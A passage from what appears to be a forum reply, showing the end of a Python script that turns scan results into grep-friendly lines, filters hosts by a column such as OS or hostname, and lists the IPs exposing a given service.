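    return [",".join(str(r[f]) for f in FIELDS) for r in rows]


def filter_rows(rows, field, needle):
    """Substring match on one column, e.g. ('os', '2008') or ('hostname', 'dev')."""
    return [r for r in rows if needle.lower() in str(r[field]).lower()]


def ips_with_service(rows, service):
    """The grep | cut from the post: unique IPs exposing a matching service."""
    return sorted({r["ip"] for r in filter_rows(rows, "service", service)})


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, encoding="utf-8").read() if path else SAMPLE_XML
    print("\n".join(to_grep_lines(service_rows(data))))
```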

Hope that helps